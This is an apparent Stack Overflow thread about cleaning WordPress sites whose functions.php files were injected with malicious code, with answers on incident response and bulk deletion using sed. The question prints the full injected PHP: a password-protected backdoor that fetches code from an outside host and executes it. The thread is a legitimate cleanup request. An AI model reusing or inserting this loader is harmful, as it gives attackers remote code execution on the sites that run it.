# Removing a large string of text / code from multiple files in Linux

Tags: regex, linux, vim

It appears mutiple domains on my Linux server have been hacked - I'm not entirely sure how, I can't think like a hacker! but they've managed to hack multiple domains running wordpress.

I've found out they've insereted some site rediction code in my functions.php files at multiple locations.  I have hundereds of these files and it'd take me ages to manually strip out each piece of code.  Is there a quick way of removing the code from all files using a global search/replace?

The offending code is:

```
<?php

if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '751486a687f91a0d030551bb518f903e'))
        {
$div_code_name="wp_vcd";
                switch ($_REQUEST['action'])
                        {






                                case 'change_domain';
                                        if (isset($_REQUEST['newdomain']))
                                                {

                                                        if (!empty($_REQUEST['newdomain']))
                                                                {
                                                                           if ($file = @file_get_contents(__FILE__))
                                                                                    {
                                                                                                 if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code8\.php/i',$file,$matcholddomain))
                                                                                                             {

                                                                                                   $file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
                                                                                                   @file_put_contents(__FILE__, $file);
                                                                                                   print "true";
                                                                                                             }


                                                                                    }
                                                                }
                                                }
                                break;



                                default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
                        }

                die("");
        }




if ( ! function_exists( 'theme_temp_setup' ) ) {
$path=$_SERVER['HTTP_HOST'].$_SERVER[REQUEST_URI];
if ( stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {

function file_get_contents_tcurl($url) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);

    $data = curl_exec($ch);
    curl_close($ch);

    return $data;
}


function theme_temp_setup($phpCode) {
    $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
    $handle = fopen($tmpfname, "w+");
    fwrite($handle, "<?php\n" . $phpCode);
    fclose($handle);
    include $tmpfname;
    unlink($tmpfname);
    return get_defined_vars();
}


if($tmpcontent = @file_get_contents("http://www.verna.cc/code8.php"))
{
extract(theme_temp_setup($tmpcontent));
}
elseif($tmpcontent = @file_get_contents_tcurl("http://www.verna.cc/code8.php"))
{
extract(theme_temp_setup($tmpcontent));
}


}
}



?>
```

Comment: I ended up manually editing each file in vim, using "d90" to strip out 90 lines off offending code from the header of each file.  There's obviosuly a much quicker and elegant way of doing this but I don't know what it is!

Comment: Don't you have a backup of all your files ? That would be by far the easiest way to restore it. Otherwise, you can use `sed` to replace code in multiple files, something like `sed -i 's/oldPattern/newPattern/g' *.php`

Comment: Thanks Mean-Street - I though using sed for pattern matching at that level only works on single line line - not for something that spans 90 lines?

Answer (score 1, accepted):

If a server is hacked, removing the malicious code should not be your major / only concern. There's plenty more information on [Information Security](https://security.stackexchange.com/) and elsewhere, but in a nutshell:

- You should first take the server offline (to avoid serving malicious code).
- Analyze and fix the security hole that allowed the intrusion.
- Regain trust of your server; best by restoring from a good image; at a minimum, by restoring your affected code from a backup.

You don't have a backup and don't know how to secure the box (or spend the money so someone else does it for you)? Some people will argue you have no business of having a public server at all...

---

To answer your actual question: This is best done with a non-interactive tool such as `sed`. If the number of added lines is constant and at the same position, static line numbers will do:

```
sed -i '2,92d' file.php
```

Comment: Thanks Ingo - it was indeed a wake-up call.  I've spent so much time running the business, I've pretty much neglected the website.  I've since hardened the site significantly, removed the nasty piece of code that managed to wreak havoc - it was itself a php file sitting in the wp-content/includes directory that on execution managed to traverse the filesystem injecting code in php files it came across.  I've closed off what I believe was the entry point, locked the server and website down and also now have regular backups of both the filesystem and database!